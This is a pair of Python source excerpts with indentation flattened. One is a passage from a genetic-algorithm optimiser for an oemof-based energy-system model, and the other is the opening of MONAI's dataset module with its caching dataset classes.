max(values1) == min(values1) or max(values2) == min(values2)):
return [1e100]*n
distance = [0]*n
sorted1 = sort_by_values(n, values1)
sorted2 = sort_by_values(n, values2)
distance[0] = 1e100 # border
distance[-1] = 1e100
for k in range(1, n-1):
distance[k] = distance[k] + (values1[sorted1[k+1]] -
values2[sorted1[k-1]])/(max(values1)-min(values1))
for k in range(1, n-1):
distance[k] = distance[k] + (values1[sorted2[k+1]] -
values2[sorted2[k-1]])/(max(values2)-min(values2))
return distance
def crossover(parent1, parent2):
"""Uniform crossover between two parents
Selects random (independent) genes from one parent or the other
:param parent1: First parent
:type parent1: :class:`Individual`
:param parent2: Second parent
:type parent2: :class:`Individual`
:return: Crossover between parents
:rtype: :class:`Individual`
"""
child = Individual([gene for gene in parent1]) # copy parent1
for gene_idx, gene in enumerate(parent2):
if random.random() < 0.5:
child[gene_idx] = gene
return child
def mutate(parent, attribute_variation):
"""Mutate a random number of parent genes around original value, within variation
:param parent: parent individual
:type parent: :class:`Individual`
:param attribute_variation: AV for all genes in parent
:type attribute_variation: list of :class:`AttributeVariation`
:return: child with some parent genes randomly mutated
:rtype: :class:`Individual`
"""
# copy parent genes
child = Individual([gene for gene in parent])
# change between one and all genes of parent
num_genes_to_change = random.randint(1, len(child))
# get indices of genes to change
genes_to_change = random.sample(range(len(child)), num_genes_to_change)
for mut_gene_idx in genes_to_change:
value = child[mut_gene_idx]
# compute smallest distance to min/max of attribute
val_min = attribute_variation[mut_gene_idx].val_min
val_max = attribute_variation[mut_gene_idx].val_max
delta_min = value - val_min
delta_max = val_max - value
delta = min(delta_min, delta_max)
# sigma influences spread of random numbers
# try to keep between min and max of attribute
sigma = delta / 3.0 if delta > 0 else 1.0
# get new value within normal distribution around current value
value = random.gauss(value, sigma)
if attribute_variation[mut_gene_idx].val_step:
# quantize new value
step = attribute_variation[mut_gene_idx].val_step
value = round((value - val_min) / step) * step + val_min
# clip value to bounds
value = min(max(value, val_min), val_max)
child[mut_gene_idx] = value
return child
def fitness_function(
index, individual,
model,
attribute_variation,
dill_objectives,
ignore_zero=False,
save_results=False):
"""Compute fitness for one individual
Called async: copies of individual and model given
:param index: index within population
:type index: int
:param individual: individual to evaluate
:type individual: :class:`Individual`
:param model: smooth model
:type model: dict
:param attribute_variation: attribute variations
:type attribute_variation: list of :class:`AttributeVariation`
:param dill_objectives: objective functions
:type dill_objectives: tuple of lambda-functions pickled with dill
:param ignore_zero: ignore components with an attribute value of zero
:type ignore_zero: boolean
:param save_results: save smooth result in individual?
:type save_results: boolean
:return: index, modified individual with fitness (None if failed)
and smooth_result (none if not save_results) set
:rtype: tuple(int, :class:`Individual`)
"""
# update (copied) oemof model
for i, av in enumerate(attribute_variation):
if ignore_zero and individual[i] == 0:
# remove component with zero value from model
# use pop instead of del in case component is removed multiple times
model['components'].pop(av.comp_name, None)
else:
model['components'][av.comp_name][av.comp_attribute] = individual[i]
# Now that the model is updated according to the genes given by the GA, run smooth
try:
smooth_result = run_smooth(model)[0]
individual.smooth_result = smooth_result if save_results else None
# update fitness with given objective functions
objectives = dill.loads(dill_objectives)
individual.fitness = tuple(f(smooth_result) for f in objectives)
except Exception as e:
# The smooth run failed.The fitness score remains None.
print('Evaluation canceled ({})'.format(str(e)))
return index, individual
class PlottingProcess(mp.Process):
"""Process for plotting the intermediate results
Data is sent through (onedirectional) pipe.
It should be a dictionary containing "values" (array of :class:`Individual`)
and "gen" (current generation number, displayed in title).
Send None to stop listening for new data and block the Process by showing the plot.
After the user closes the plot, the process returns and can be joined.
:param pipe: data transfer channel
:type pipe: `multiprocessing pipe \
<https://docs.python.org/3/library/multiprocessing.html#multiprocessing.Pipe>`_
:param attribute_variation: AV of :class:`Optimization`
:type attribute_variation: list of :class:`AttributeVariation`
:param objective_names: descriptive names of :class:`Optimization` objectives
:type objective_names: list of strings
:var exit_flag: Multiprocessing event signalling process should be stopped
:var fig: figure for plotting
:var ax: current graphic axis for plotting
:var points: plotted results or None
:var annot: current annotation or None
"""
def __init__(self):
self.exit_flag = mp.Event()
self.exit_flag.clear()
def main(self):
"""Main plotting thread
Loops while exit_flag is not set and user has not closed window.
Checks periodically for new data to be displayed.
"""
# start of main loop: no results yet
plt.title("Waiting for first results...")
# loop until exit signal
while not self.exit_flag.is_set():
# poll with timeout (like time.sleep)
while self.pipe.poll(0.1):
# something in pipe
data = self.pipe.recv()
if data is None:
# special case
plt.title("Finished!")
# block process until user closes window
plt.show()
# exit process
return
else:
# process sent data
# save sent results to show in annotation later
self.values = data["values"]
# use abs(r[]) to display positive values
f1_vals = [r.fitness[0] for r in data["values"]]
f2_vals = [r.fitness[1] for r in data["values"]]
# reset figure
self.ax.clear()
# redraw plot with new data
self.points, = self.ax.plot(f1_vals, f2_vals, '.b')
# new title and labels
plt.title(data.get("title", "Pareto front"), {'zorder': 1})
plt.xlabel(self.objective_names[0])
plt.ylabel(self.objective_names[1])
self.fig.canvas.draw()
try:
# redraw plot, capture events
plt.pause(0.1)
except TclError:
# window may have been closed: exit process
return
# exit signal sent: stop process
return
def handle_close(self, event):
"""Called when user closes window
Signal main loop that process should be stopped.
"""
self.exit_flag.set()
def hover(self, event):
"""Called when user hovers over plot.
Checks if user hovers over point. If so, delete old annotation and
create new one with relevant info from all Indivdiuals corresponding to this point.
If user does not hover over point, remove annotation, if any.
"""
if self.points and event.inaxes == self.ax:
# results shown, mouse within plot: get event info
# cont: any points hovered?
# ind: list of points hovered
cont, ind = self.points.contains(event)
if cont and "ind" in ind:
ind = ind["ind"]
# points hovered
# get all point coordinates
x, y = self.points.get_data()
text = []
for idx in ind:
# loop over points hovered
ind_text = ""
max_line_len = 0
# list all attribute variations with name and value
for av_idx, av in enumerate(self.attribute_variation):
line = "{}.{}: {}\n".format(
av.comp_name,
av.comp_attribute,
self.values[idx][av_idx])
ind_text += line
max_line_len = max(max_line_len, len(line))
# separator line
ind_text += '-'*max_line_len + "\n"
# list all objectives with name and value
for obj_idx, obj in enumerate(self.objective_names):
ind_text += "{}: {}\n".format(obj, self.values[idx].fitness[obj_idx])
text.append(ind_text)
text = "\n".join(text)
# remove old annotation
if self.annot:
self.annot.remove()
# create new annotation
self.annot = self.ax.annotate(
text,
xy=(x[ind[0]], y[ind[0]]),
xytext=(-20, 20),
textcoords="offset points",
bbox=dict(boxstyle="round", fc="w"),
arrowprops={'arrowstyle': "-"},
annotation_clip=False)
# self.annot.get_bbox_patch().set_alpha(0.4)
self.fig.canvas.draw()
elif self.annot and self.annot.get_visible():
# no point hovered, but annotation present: remove annotation
self.annot.remove()
self.annot = None
self.fig.canvas.draw()
def __call__(self, pipe, attribute_variation, objective_names):
"""Process entry point.
Set up plotting window, necessary variables and callbacks, call main loop.
"""
self.pipe = pipe
self.attribute_variation = attribute_variation
self.objective_names = objective_names
self.fig, self.ax = plt.subplots()
self.points = None
self.annot = None
self.fig.canvas.mpl_connect('close_event', self.handle_close)
self.fig.canvas.mpl_connect("motion_notify_event", self.hover)
self.main()
class Optimization:
"""Main optimization class to save GA parameters
:param n_core: number of threads to use.
May be 'max' to use all (virtual) cores
:type n_core: int or 'max'
:param n_generation: number of generation to run
:type n_generation: int
:param population_size: number of new children per generation.
The actual size of the population may be higher -
however, each individual is only evaluated once
:type population_size: int
:param attribute_variation: attribute variation information that will be used by the GA
:type attribute_variation: list of dicts, see :class:`AttributeVariation`
:param model: smooth model
:type model: dict
:param objectives: multi-objectives to optimize.
These functions take the result from `run_smooth` and return a float.
Positive sign maximizes, negative sign minimizes.
Defaults to minimizing annual costs and emissions
:type objectives: 2-tuple of lambda functions
:param objective_names: descriptive names for optimization functions.
Defaults to ('costs', 'emissions')
:type objective_names: 2-tuple of strings, optional
:param post_processing: improve GA solution with gradient ascent. Defaults to False
:type post_processing: boolean, optional
:param plot_progress: plot current pareto front. Defaults to False
:type plot_progress: boolean, optional
:param ignore_zero: ignore components with an attribute value of zero. Defaults to False
:type ignore_zero: boolean, optional
:param save_intermediate_results: write intermediate results to pickle file.
Only the two most recent results are saved. Defaults to False
:type save_intermediate_results: boolean, optional
:param SAVE_ALL_SMOOTH_RESULTS: save return value of `run_smooth`
for all evaluated individuals.
**Warning!** When writing the result to file,
this may greatly increase the file size. Defaults to False
:type SAVE_ALL_SMOOTH_RESULTS: boolean, optional
:var population: current individuals
:type population: list of Individual
:var evaluated: keeps track of evaluated individuals to avoid double computation
:type evaluated: dict with fingerprint of individual->:class:`Individual`
:var ax: current figure handle for plotting
:type ax: pyplot Axes
:raises: `AttributeError` or `AssertionError` when required argument is missing or wrong
"""
def __init__(self, iterable=(), **kwargs):
# set defaults
self.post_processing = False
self.plot_progress = False
self.ignore_zero = False
self.save_intermediate_results = False
self.SAVE_ALL_SMOOTH_RESULTS = False
# objective functions: tuple with lambdas
# negative sign for minimizing
# defaults to minimum of annual costs and emissions
self.objectives = (
lambda x: -sum([c.results["annuity_total"] for c in x]),
lambda x: -sum([c.results["annual_total_emissions"] for c in x]),
)
# objective names for plotting
self.objective_names = ('costs', 'emissions')
# set parameters from args
self.__dict__.update(iterable, **kwargs)
# how many CPU cores to use
try:
assert(self.n_core)
except (AssertionError, AttributeError):
print("No CPU count (n_core) given. Using all cores.")
self.n_core = mp.cpu_count()
if self.n_core == "max":
self.n_core = mp.cpu_count()
# population size
try:
assert(self.population_size)
except (AssertionError, AttributeError):
raise AssertionError("No population size given")
# number of generations to run
# TODO run until no more change?
try:
assert(self.n_generation)
except (AssertionError, AttributeError):
raise AssertionError("Number of generations not set")
# attribute variation
try:
assert(self.attribute_variation)
except (AssertionError, AttributeError):
raise AssertionError("No attribute variation given")
self.attribute_variation = [AttributeVariation(av) for av in self.attribute_variation]
# oemof model to solve
try:
assert(self.model)
except (AssertionError, AttributeError):
raise AssertionError("No model given.")
# objectives
assert len(self.objectives) == 2, "Need exactly two objective functions"
assert len(self.objectives) == len(
self.objective_names), "Objective names don't match objective functions"
# Init population with random values between attribute variation (val_max inclusive)
self.population = []
self.evaluated = {}
# save intermediate results?
if self.save_intermediate_results:
self.last_result_file_name = ""
self.current_result_file_name = ""
# plot intermediate results?
if self.plot_progress:
# set up plotting process with unidirectional pipe
plot_pipe_rx, self.plot_pipe_tx = mp.Pipe(duplex=False)
self.plot_process = mp.Process(
target=PlottingProcess(),
args=(plot_pipe_rx, self.attribute_variation, self.objective_names))
self.plot_process.start()
def err_callback(self, err_msg):
"""Async error callback
:param err_msg: error message to print
:type err_msg: string
"""
print('Callback error at parallel computing! The error message is: {}'.format(err_msg))
def set_fitness(self, result):
"""Async success callback
Update master individual in population and `evaluated` dictionary
:param result: result from fitness_function
:type result: tuple(index, :class:`Individual`)
"""
self.population[result[0]] = result[1]
self.evaluated[str(result[1])] = result[1]
def compute_fitness(self):
"""Compute fitness of every individual in `population` with `n_core` worker threads.
Remove invalid individuals from `population`
"""
# open n_core worker threads
pool = mp.Pool(processes=self.n_core)
# set objective functions for each worker
dill_objectives = dill.dumps(self.objectives)
for idx, ind in enumerate(self.population):
if ind.fitness is None: # not evaluated yet
pool.apply_async(
fitness_function,
(idx, ind, self.model, self.attribute_variation,
dill_objectives, self.ignore_zero, self.SAVE_ALL_SMOOTH_RESULTS),
callback=self.set_fitness,
error_callback=self.err_callback # tb
)
pool.close()
pool.join()
def save_intermediate_result(self, result):
"""Dump result into pickle file in current working directory.
Same content as smooth.save_results.
The naming schema follows *date*-*time*-intermediate_result.pickle.
Removes second-to-last pickle file from same run.
:param result: the current results to be saved
:type result: list of :class:`Individual`
"""
# prepare file name by format
filename_format = "%Y-%m-%d_%H-%M-%S_intermediate_result.pickle"
new_result_file_name = datetime.now().strftime(filename_format)
# write result to file
with open(new_result_file_name, 'wb') as save_file:
pickle.dump(result, save_file)
# delete second-to-last result file (if not rewritten)
if (os.path.exists(self.last_result_file_name)
and self.last_result_file_name != self.current_result_file_name):
os.remove(self.last_result_file_name)
# update status
self.last_result_file_name = self.current_result_file_name
self.current_result_file_name = new_result_file_name
print("Save intermediate results in {}".format(new_result_file_name))
def gradient_ascent(self, result):
"""Try to fine-tune result(s) with gradient ascent
Attributes are assumed to be independent and varied separately.
Solutions with the same fitness are ignored.
:param result: result from GA
:type result: list of :class:`Individual`
:return: improved result
:rtype: list of :class:`Individual`
"""
print('\n+++++++ Intermediate result +++++++')
for i, v in enumerate(result):
print(i, v.values, " -> ", dict(zip(self.objective_names, v.fitness)))
print('+++++++++++++++++++++++++++++++++++\n')
new_result = []
# ignore solutions with identical fitness
for i in range(len(result)):
known_fitness = False
for j in range(len(new_result)):
known_fitness |= new_result[j].fitness == result[i].fitness
if not known_fitness:
new_result.append(result[i])
num_results = len(new_result)
for av_idx, av in enumerate(self.attribute_variation):
# iterate attribute variations (assumed to be independent)
print("Gradient descending {} / {}".format(av_idx+1, len(self.attribute_variation)))
step_size = av.val_step or 1.0 # required for ascent
self.population = []
for i in range(num_results):
# generate two children around parent to get gradient
parent = new_result[i]
# "below" parent, clip to minimum
child1 = Individual([gene for gene in parent])
child1[av_idx] = max(parent[av_idx] - step_size, av.val_min)
child1_fingerprint = str(child1)
# "above" parent, clip to maximum
child2 = Individual([gene for gene in parent])
child2[av_idx] = min(parent[av_idx] + step_size, av.val_max)
child2_fingerprint = str(child2)
# add to population. Take evaluated if exists
try:
self.population.append(self.evaluated[child1_fingerprint])
except KeyError:
self.population.append(child1)
try:
self.population.append(self.evaluated[child2_fingerprint])
except KeyError:
self.population.append(child2)
# compute fitness of all new children
# Keep invalid to preserve order (match parent to children)
self.compute_fitness()
# take note which direction is best for each individual
# may be positive or negative step size or 0 (no fitness improvement)
step = [0] * num_results
for i in range(num_results):
parent = new_result[i]
child1 = self.population[2*i]
child2 = self.population[2*i+1]
# get domination within family
if child1.dominates(parent):
if child2.dominates(child1):
# child 2 dominates
step[i] = step_size
new_result[i] = child2
else:
# child 1 dominates
step[i] = -step_size
new_result[i] = child1
else:
# child1 does not dominate parent
if child2.dominates(parent):
# child 2 dominates
step[i] = step_size
new_result[i] = child2
else:
# parent is not dominated
step[i] = 0.0
# continue gradient ascent of solutions until local optimum reached for all
while sum(map(abs, step)) != 0.0:
# still improvement: create new population
self.population = []
# dict for saving position of parent element
reference = {}
idx = 0
# build new population
# only parents with step != 0 (still changing)
# each parent with step != 0 at least once
# fill up to n_cores with multiples of steps
# only non-evaluated configurations allowed
while(len(self.population) < max(num_results, self.n_core)):
# position of parent element
pos = idx % num_results
# multiplier for step size (at least 1)
mult = (idx // num_results) + 1
if mult > 1 and len(self.population) >= self.n_core:
# population full
break
if idx > 1000 * num_results:
# avoid endless loop (no more valid entries?)
break
if step[pos]:
# result with step: generate child in step direction
parent = new_result[pos]
child = Individual([gene for gene in parent])
mul_step = step[pos] * mult
child[av_idx] = min(max(parent[av_idx] + mul_step, av.val_min), av.val_max)
fingerprint = str(child)
# avoid double computation
if fingerprint not in self.evaluated:
# child config not seen so far
self.population.append(child)
# block, so not in population again
self.evaluated[fingerprint] = None
# keep track of parent position
reference[len(self.population) - 1] = pos
idx += 1
# compute fitness of all new children
# Keep invalid to preserve order (match children to parent)
self.compute_fitness()
# check new dominance of parent and children
# default: no improvement -> stop ascent of this attribute
new_step = [0] * len(step)
for idx, child in enumerate(self.population):
parent_idx = reference[idx]
parent = new_result[parent_idx]
if child.dominates(parent):
# domination continues: save child, keep base step
# this ensures a new generation
new_result[parent_idx] = child
new_step[parent_idx] = step[parent_idx]
# update step sizes
step = new_step
# show current result in plot
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send({
'title': 'Gradient descending AV #{}'.format(av_idx+1),
'values': new_result
})
# no more changes in any solution for this AV: give status update
if self.save_intermediate_results:
self.save_intermediate_result(new_result)
# show current result in plot
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send({
'title': 'Front after gradient descending AV #{}'.format(av_idx+1),
'values': new_result
})
# change next AV
return new_result
def run(self):
"""Main GA function
:return: pareto-optimal configurations
:rtype: list of :class:`Individual`
"""
random.seed() # init RNG
print('\n+++++++ START GENETIC ALGORITHM +++++++')
print('The optimization parameters chosen are:')
print(' population_size: {}'.format(self.population_size))
print(' n_generation: {}'.format(self.n_generation))
print(' n_core: {}'.format(self.n_core))
print('+++++++++++++++++++++++++++++++++++++++\n')
result = []
for gen in range(self.n_generation):
# generate offspring
children = []
# only children not seen before allowed in population
# set upper bound for maximum number of generated children
# population may not be pop_size big (invalid individuals)
for tries in range(1000 * self.population_size):
if (len(children) == self.population_size):
# population full (pop_size new individuals)
break
# get random parents from pop_size best results
try:
[parent1, parent2] = random.sample(self.population, 2)
# crossover and mutate parents
child = mutate(crossover(parent1, parent2), self.attribute_variation)
except ValueError:
# not enough parents left / initial generation: generate random configuration
individual = []
for av in self.attribute_variation:
if av.val_step:
value = random.randrange(0, av.num_steps) * av.val_step + av.val_min
else:
value = random.uniform(av.val_min, av.val_max)
individual.append(value)
child = Individual(individual)
# check if child configuration has been seen before
fingerprint = str(child)
if fingerprint not in self.evaluated:
# child config not seen so far
children.append(child)
# block, so not in population again
self.evaluated[fingerprint] = None
else:
print("Warning: number of retries exceeded. \
{} new configurations generated.".format(len(children)))
if len(children) == 0:
# no new children could be generated
print("Aborting.")
break
# New population generated (parents + children)
self.population += children
# evaluate generated population
self.compute_fitness()
# filter out individuals with invalid fitness values
self.population = list(
filter(lambda ind: ind is not None and ind.fitness is not None, self.population))
if len(self.population) == 0:
# no configuration was successful
print("No individuals left. Building new population.")
continue
# sort population by fitness
f1_vals2 = [i.fitness[0] for i in self.population]
f2_vals2 = [i.fitness[1] for i in self.population]
FNDS = fast_non_dominated_sort(self.population)
CDF_values = [CDF(f1_vals2, f2_vals2, len(NDS)) for NDS in FNDS]
# select individuals on pareto front, depending on fitness and distance
pop_idx = []
for i in range(0, len(FNDS)):
FNDS2 = [FNDS[i].index(FNDS[i][j]) for j in range(0, len(FNDS[i]))]
front22 = sort_by_values(len(FNDS2), CDF_values[i])
front = [FNDS[i][front22[j]] for j in range(0, len(FNDS[i]))]
front.reverse()
pop_idx += [v for v in front[:self.population_size-len(pop_idx)]]
if (len(pop_idx) == self.population_size):
break
# save pareto front
# values/fitness tuples for all non-dominated individuals
result = [self.population[i] for i in FNDS[0]]
# print info of current pareto front
print("The best front for Generation # {} / {} is".format(
gen+1, self.n_generation))
for i, v in enumerate(FNDS[0]):
print(i, self.population[v], self.population[v].fitness)
print("\n")
# save result to file
if self.save_intermediate_results:
self.save_intermediate_result(result)
# show current pareto front in plot
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send({
'title': 'Front for Generation #{}'.format(gen + 1),
'values': result
})
self.population = [self.population[i] for i in pop_idx]
# next generation
result.sort(key=lambda v: -v.fitness[0])
if self.post_processing:
result = self.gradient_ascent(result)
print('\n+++++++ GENETIC ALGORITHM FINISHED +++++++')
for i, attr in enumerate(self.attribute_variation):
print(' {} - {}'.format(
attr.comp_name, attr.comp_attribute))
for i, v in enumerate(result):
print(i, v.values, " -> ", dict(zip(self.objective_names, v.fitness)))
print('+++++++++++++++++++++++++++++++++++++++++++\n')
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send(None) # stop drawing, show plot
self.plot_process.join() # wait until user closes plot
# remove old intermediate results
if self.save_intermediate_results:
if os.path.exists(self.last_result_file_name):
os.remove(self.last_result_file_name)
if os.path.exists(self.current_result_file_name):
os.remove(self.current_result_file_name)
return result
def run_optimization(opt_config, _model):
"""Entry point for genetic algorithm
:param opt_config: Optimization parameters.
May have separate `ga_params` dictionary or define parameters directly.
See :class:`Optimization`.
:type opt_config: dict
:param _model: smooth model
:type _model: dict or list (legacy)
:return: pareto-optimal configurations
:rtype: list of :class:`Individual`
"""
# save GA params directly in config
opt_config.update(opt_config.pop("ga_params", dict))
if isinstance(_model["components"], list):
# simplify oemof model: instead of components array, have dict with component names as key
_names = [c.pop("name") for c in _model["components"]]
_model.update({'components': dict(zip(_names, _model["components"]))})
# save oemof model in config
opt_config.update({"model": _model})
# run GA
return Optimization(opt_config).run()
|
dataset.py
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.serialization import DEFAULT_PROTOCOL
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import SUPPORTED_PICKLE_MOD, convert_tables_to_dicts, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform, convert_to_contiguous
from monai.utils import MAX_SEED, deprecated_arg, get_seed, look_up_option, min_version, optional_import
from monai.utils.misc import first
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class DatasetFunc(Dataset):
"""
Execute function on the input dataset and leverage the output to act as a new Dataset.
It can be used to load / fetch the basic dataset items, like the list of `image, label` paths.
Or chain together to execute more complicated logic, like `partition_dataset`, `resample_datalist`, etc.
The `data` arg of `Dataset` will be applied to the first arg of callable `func`.
Usage example::
data_list = DatasetFunc(
data="path to file",
func=monai.data.load_decathlon_datalist,
data_list_key="validation",
base_dir="path to base dir",
)
# partition dataset for every rank
data_partition = DatasetFunc(
data=data_list,
func=lambda **kwargs: monai.data.partition_dataset(**kwargs)[torch.distributed.get_rank()],
num_partitions=torch.distributed.get_world_size(),
)
dataset = Dataset(data=data_partition, transform=transforms)
Args:
data: input data for the func to process, will apply to `func` as the first arg.
func: callable function to generate dataset items.
kwargs: other arguments for the `func` except for the first arg.
"""
def __init__(self, data: Any, func: Callable, **kwargs) -> None:
super().__init__(data=None, transform=None) # type:ignore
self.src = data
self.func = func
self.kwargs = kwargs
self.reset()
def reset(self, data: Optional[Any] = None, func: Optional[Callable] = None, **kwargs):
"""
Reset the dataset items with specified `func`.
Args:
data: if not None, execute `func` on it, default to `self.src`.
func: if not None, execute the `func` with specified `kwargs`, default to `self.func`.
kwargs: other arguments for the `func` except for the first arg.
"""
src = self.src if data is None else data
self.data = self.func(src, **self.kwargs) if func is None else func(src, **kwargs)
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths and will hash them as cache keys.
When loading persistent cache content, it can't guarantee the cached data matches current
transform chain, so please make sure to use exactly the same non-random transforms and the
args as the cache content, otherwise, it may cause unexpected errors.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
default to `"pickle"`. due to the pickle limitation in multi-processing of Dataloader,
we can't use `pickle` as arg directly, so here we use a string name instead.
if want to use other pickle module at runtime, just register like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
self.pickle_module = pickle_module
self.pickle_protocol = pickle_protocol
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is None:
return _item_transformed
